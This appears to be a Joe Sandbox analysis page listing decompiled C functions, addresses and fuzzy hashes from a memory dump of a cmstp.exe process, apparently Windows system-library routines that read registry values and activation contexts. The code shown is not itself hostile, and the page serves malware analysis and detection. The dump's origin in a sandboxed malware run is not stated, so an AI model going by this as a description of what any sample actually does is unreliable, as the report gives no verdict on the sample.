0x051a0fd1
0x051a0fe3
0x051a0fd3
0x051a0fdc
0x051a0fdc
0x051a0feb
0x051a1009
0x051a1009
0x051a1015
0x051a1027
0x051a1017
0x051a1020
0x051a1020
0x051a102f
0x051a103c
0x051a103c
0x051a1048
0x051a1050
0x051a1050
0x051a1055
0x00000000
0x051a1055
0x051a0f88
0x051a0f9e
0x051a0fa2
0x051a0fa9
0x00000000
0x00000000
0x00000000
0x051a0fa9
0x00000000

Strings

`, xrefs: 051A0F16

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 029962d3030207445ce318daea27ea050b5eed8d17087a560b71ba492e251e93
Instruction ID: cfa628c5dca4620c6a0c1e6830340890b21b78569b3593d1554a32d2b1bfb9a6
Opcode Fuzzy Hash: 029962d3030207445ce318daea27ea050b5eed8d17087a560b71ba492e251e93
Instruction Fuzzy Hash: 8D51CD76208341AFD326DF28D988B5BB7E5FB88210F04092CF99297291D775E905CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0510F0BF Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0510F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E050F4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E05119830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E05119990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E051195D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x3a2bc01a
							_t109 = L050F4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x20033a2b
								E0511F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x20033a2b
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E051195D0();
										L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0510f0d3
0x0510f0d9
0x0510f0e0
0x0510f0e7
0x0510f0f2
0x0510f0f4
0x0510f0f8
0x0510f100
0x0510f108
0x0510f10d
0x0510f115
0x0510f116
0x0510f11f
0x0510f123
0x0510f124
0x0510f12c
0x0510f130
0x0510f134
0x0510f13d
0x0510f144
0x0510f14b
0x0510f152
0x0514bab0
0x0514bab0
0x0510f158
0x0510f158
0x0510f15a
0x0510f160
0x0510f165
0x0510f166
0x0510f16f
0x0510f173
0x0514baa7
0x0514baa7
0x0514baab
0x00000000
0x0510f179
0x0510f179
0x0510f18d
0x0510f191
0x0514baa2
0x00000000
0x0510f197
0x0510f19b
0x0510f1a2
0x0510f1a9
0x0510f1af
0x0510f1b2
0x0510f1b6
0x0510f1b9
0x0510f1c0
0x0510f1c4
0x0510f1d8
0x0510f1df
0x0510f1e3
0x0510f1e6
0x0510f1eb
0x0510f1ee
0x0510f1f4
0x0510f20f
0x0514bab7
0x0514babb
0x0514bacc
0x0514bad1
0x0510f215
0x0510f218
0x0510f226
0x0510f22b
0x00000000
0x0510f22b
0x0510f1f6
0x0510f1f6
0x0510f1f9
0x0510f1fb
0x0510f1fb
0x0510f1f4
0x0510f191
0x0510f173
0x0510f152
0x0510f203

Strings

@, xrefs: 0510F124

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 14d3b1506f01bc78a7df0148d8a8ede2d8c036b7e24e76a70f5bf934d75b7d4c
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: D4518D71604710AFC321DF29C841A6BBBF9FF48710F10892EFAA597690E7B4E915CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05153540 Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E05153540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x51cd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E05110BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E05153706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0511FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E05153540;
						E0511FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0512DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E05160C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E051197C0();
					}
					return E0511B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E05153971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E05153884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0511FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E05119650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E05153787(_a4,  &_v352, _t80);
						}
					}
					L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E051195D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x05153552
0x0515355a
0x0515355d
0x05153566
0x05153567
0x0515357e
0x0515358f
0x051535a1
0x051535a5
0x0515366b
0x0515366b
0x0515366d
0x05153672
0x05153679
0x05153685
0x0515368d
0x0515369d
0x051536a7
0x051536b8
0x051536c6
0x051536c7
0x051536dc
0x051536e1
0x051536e7
0x051536e9
0x051536e9
0x05153703
0x05153703
0x051535b5
0x051535c0
0x051535c4
0x00000000
0x00000000
0x051535ca
0x051535d7
0x051535e2
0x051535e6
0x051535e8
0x051535f5
0x051535fa
0x05153603
0x05153604
0x05153609
0x0515360a
0x05153612
0x05153613
0x0515361e
0x05153622
0x05153628
0x0515362f
0x0515362f
0x05153636
0x05153638
0x0515363b
0x05153642
0x05153642
0x05153636
0x05153657
0x05153657
0x0515365c
0x05153662
0x05153669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0515358F

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: fca2cb3b93b2b7faa2fb4d4350cc8535fec934e58946527245c3b171b7c4b375
Instruction ID: 20ba3d838a570850f8eaa3055b69a159788bddfcfb13554ffe9da0dc0845e394
Opcode Fuzzy Hash: fca2cb3b93b2b7faa2fb4d4350cc8535fec934e58946527245c3b171b7c4b375
Instruction Fuzzy Hash: F94133B1D0052D9BDB219E50DC84FEEB77CAB44764F0045E5EA29A7241DB309F89CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 051A05AC Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E051A05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E051A07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E05119730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0519A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0519A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E051A1293(_t79, _v40, E051A07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E050F7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0519138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x051a05c5
0x051a05ca
0x051a05d3
0x051a06db
0x051a06db
0x051a06dd
0x051a06e3
0x051a06e3
0x051a05dd
0x051a05e7
0x051a05f6
0x051a0600
0x051a0607
0x051a0610
0x051a0615
0x051a061a
0x051a061c
0x051a061e
0x051a0624
0x051a0625
0x051a0627
0x051a0628
0x051a0631
0x051a0640
0x051a064d
0x051a0654
0x051a0654
0x051a0631
0x051a066d
0x051a0674
0x00000000
0x00000000
0x051a0692
0x051a069e
0x051a06b0
0x051a06a0
0x051a06a9
0x051a06a9
0x051a06b8
0x051a06d6
0x051a06d6
0x00000000

Strings

`, xrefs: 051A0633

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 735ab578a02dcbd669b261fe6c861b4b84485ef26b16c58065267a4a097d6feb
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: FA3111327087056BE722DE25CD88F9B77D9FBC8758F044229FA599B280D770E908CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05153884 Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E05153884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E05119650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L050F4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E05119650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x05153893
0x05153896
0x05153899
0x0515389f
0x051538a0
0x051538a4
0x051538a9
0x051538ac
0x051538ad
0x051538ae
0x051538af
0x051538b1
0x051538b4
0x051538bb
0x051538bc
0x051538bd
0x051538c4
0x051538c8
0x051538ca
0x051538ca
0x051538d5
0x0515393e
0x05153940
0x05153942
0x05153952
0x05153954
0x05153961
0x05153961
0x05153967
0x0515396e
0x0515396e
0x05153947
0x0515394c
0x00000000
0x0515394c
0x051538ea
0x051538ee
0x051538f8
0x051538f9
0x051538ff
0x05153900
0x05153902
0x05153903
0x0515390b
0x0515390f
0x05153950
0x00000000
0x05153950
0x05153915
0x0515391d
0x0515391d
0x05153922
0x05153926
0x00000000
0x05153928
0x0515392b
0x0515392b
0x05153935
0x05153937
0x05153937
0x00000000
0x05153935
0x05153926
0x051538f0
0x00000000

Strings

BinaryName, xrefs: 051538B4

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: 95ae210aaea7a5735cdeb34fb3c39d87f814d193bce5d8baa5381b872deaa71c
Instruction ID: acf7ddda4ad484ac7fe06d943b728e6dc98867cb2b9906c5abc21996c2b22e88
Opcode Fuzzy Hash: 95ae210aaea7a5735cdeb34fb3c39d87f814d193bce5d8baa5381b872deaa71c
Instruction Fuzzy Hash: AA31C0B290451AEFEB25DE58C945EBFB775FB80BB0F014569AD35A7290D7309E00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0510D294 Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0510D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x51cd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E050F4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0511B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E051198D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E051195D0();
					L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0510d29c
0x0510d2a6
0x0510d2b1
0x0510d2b5
0x0510d2b6
0x0510d2bc
0x0510d2bd
0x0510d2be
0x0510d2bf
0x0510d2c2
0x0510d2c4
0x0510d2cc
0x0510d384
0x0510d34b
0x0510d34f
0x0510d350
0x0510d351
0x0510d35c
0x0510d35c
0x0510d2d6
0x0510d2da
0x0510d2e1
0x0510d361
0x0510d369
0x0510d36d
0x0510d2e3
0x0510d2e3
0x0510d2e3
0x0510d2e5
0x0510d2ed
0x0510d2f5
0x0510d2fa
0x0510d302
0x0510d303
0x0510d30b
0x0510d30f
0x0510d313
0x0510d318
0x0510d31c
0x0510d320
0x0510d379
0x0510d37d
0x00000000
0x00000000
0x0514affe
0x0514b001
0x0514b011
0x00000000
0x0510d322
0x0510d322
0x0510d330
0x0510d337
0x0510d35d
0x0510d339
0x0510d33f
0x0510d38c
0x0510d38c
0x0510d33f
0x0510d349
0x00000000
0x0510d349

Strings

@, xrefs: 0510D303

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c347dce963dd9d0da56bcefdb98793964418afb49b990d6517f29ee7988f16fe
Instruction ID: 081690a8f5cf105801326638dabbfdd9d9128e323b082f2c00f23ea734f80aef
Opcode Fuzzy Hash: c347dce963dd9d0da56bcefdb98793964418afb49b990d6517f29ee7988f16fe
Instruction Fuzzy Hash: 5331DFB16083059FC321DF68E980EAFBBE9FB89654F01192EF99487290D774DD04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 050E1B8F Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E050E1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0511BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0511A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0511A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L050F4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x050e1b8f
0x050e1b9a
0x050e1b9c
0x050e1b9e
0x050e1ba3
0x05137010
0x05137010
0x00000000
0x050e1ba9
0x050e1ba9
0x050e1bae
0x00000000
0x050e1bc5
0x050e1bca
0x050e1bcf
0x050e1bd0
0x050e1bd1
0x050e1bd2
0x050e1bd6
0x050e1bdc
0x050e1be0
0x05136ffc
0x05137000
0x00000000
0x05137006
0x05137009
0x05137009
0x050e1be6
0x050e1bec
0x050e1c0b
0x050e1c0b
0x050e1c0c
0x050e1c11
0x050e1c12
0x050e1c15
0x050e1c1b
0x050e1c1f
0x050e1c31
0x050e1c33
0x05137026
0x05137026
0x050e1c21
0x050e1c24
0x050e1c24
0x050e1bee
0x050e1bee
0x050e1bf2
0x050e1c3a
0x050e1bf4
0x050e1bf4
0x050e1c05
0x050e1c05
0x050e1c09
0x050e1c3e
0x00000000
0x00000000
0x00000000
0x050e1c09
0x050e1bec
0x050e1be0
0x050e1bae
0x050e1c2e

Strings

WindowsExcludedProcs, xrefs: 050E1BC5

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: cdd96c0f5df704586480b3ec9a639d90b3b1f6ec0feefcb83c967e5d30a5e502
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: F2212576601628AFCB22DA55A944FAFB7AEFF45650F2540A1FD15EB200D730DD00C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 050FF716 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050FF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x050ff71d
0x050ff722
0x050ff726
0x05144770
0x050ff765
0x050ff769
0x050ff769
0x050ff732
0x0514477a
0x00000000
0x0514477a
0x050ff738
0x050ff73a
0x050ff73c
0x050ff73f
0x050ff746
0x050ff778
0x050ff7a9
0x050ff7a9
0x050ff754
0x050ff75a
0x050ff75d
0x050ff75f
0x050ff761
0x050ff76f
0x050ff771
0x050ff771
0x050ff76f
0x050ff763
0x00000000
0x050ff763
0x050ff77d
0x050ff7a3
0x050ff7a5
0x00000000
0x050ff7a5
0x050ff77f
0x050ff782
0x050ff784
0x050ff786
0x00000000
0x00000000
0x00000000
0x050ff788
0x050ff748
0x050ff74d
0x050ff78d
0x050ff793
0x050ff7b7
0x050ff7bc
0x00000000
0x050ff7bc
0x050ff798
0x00000000
0x00000000
0x050ff79d
0x050ff7b0
0x00000000
0x050ff7b0
0x050ff79f
0x00000000
0x050ff74f
0x050ff74f
0x00000000
0x050ff74f

Strings

Actx , xrefs: 050FF73F

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
